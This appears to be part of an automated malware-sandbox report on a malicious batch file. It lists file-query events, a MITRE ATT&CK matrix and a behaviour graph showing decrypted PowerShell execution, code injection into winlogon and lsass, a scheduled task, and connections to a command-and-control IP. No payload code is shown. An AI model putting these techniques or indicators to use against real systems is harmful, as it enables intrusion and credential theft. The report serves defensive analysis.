        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Device\v4.0_4.0.0.0__b77a5c561934e089\System.Device.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-mPeY5dGd VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-mPeY5dGd VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE9070 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_000001B780BE9070

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts121
        Windows Management Instrumentation        		1
        Scripting        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		712
        Process Injection        		2
        Obfuscated Files or Information        		121
        Input Capture        		2
        File and Directory Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		1
        DLL Side-Loading        		Security Account Manager133
        System Information Discovery        		SMB/Windows Admin Shares121
        Input Capture        		1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        PowerShell        		Login HookLogin Hook4
        Rootkit        		NTDS131
        Security Software Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Masquerading        		LSA Secrets131
        Virtualization/Sandbox Evasion        		SSHKeylogging13
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Modify Registry        		Cached Domain Credentials3
        Process Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
        Virtualization/Sandbox Evasion        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job712
        Process Injection        		Proc Filesystem1
        System Network Configuration Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
        Hidden Files and Directories        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1631966 Sample: skf7iF4.bat Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 70 Suricata IDS alerts for network traffic 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Yara detected Powershell decrypt and execute 2->74 76 6 other signatures 2->76 11 cmd.exe 1 2->11         started        process3 signatures4 92 Suspicious powershell command line found 11->92 14 powershell.exe 3 12 11->14         started        17 conhost.exe 11->17         started        process5 signatures6 94 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->94 19 cmd.exe 1 14->19         started        process7 signatures8 78 Suspicious powershell command line found 19->78 22 powershell.exe 31 30 19->22         started        26 powershell.exe 15 19->26         started        28 more.com 1 19->28         started        30 2 other processes 19->30 process9 dnsIp10 50 176.65.144.14, 4567, 49687 PALTEL-ASPALTELAutonomousSystemPS Germany 22->50 52 ipwho.is 195.201.57.90, 443, 49690 HETZNER-ASDE Germany 22->52 84 Writes to foreign memory regions 22->84 86 Modifies the context of a thread in another process (thread injection) 22->86 88 Hides that the sample has been downloaded from the Internet (zone.identifier) 22->88 90 3 other signatures 22->90 32 winlogon.exe 22->32 injected 35 findstr.exe 1 26->35         started        signatures11 process12 signatures13 62 Injects code into the Windows Explorer (explorer.exe) 32->62 64 Writes to foreign memory regions 32->64 66 Allocates memory in foreign processes 32->66 68 2 other signatures 32->68 37 lsass.exe 32->37 injected 40 svchost.exe 32->40 injected 42 svchost.exe 32->42 injected 45 26 other processes 32->45 process14 dnsIp15 80 Writes to foreign memory regions 37->80 47 svchost.exe 37->47 injected 82 System process connects to network (likely due to code injection or exploit) 40->82 54 ipwho.is 42->54 56 c.pki.goog 42->56 58 pki-goog.l.google.com 42->58 signatures16 process17 dnsIp18 60 pki-goog.l.google.com 172.217.16.131, 49691, 80 GOOGLEUS United States 47->60

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.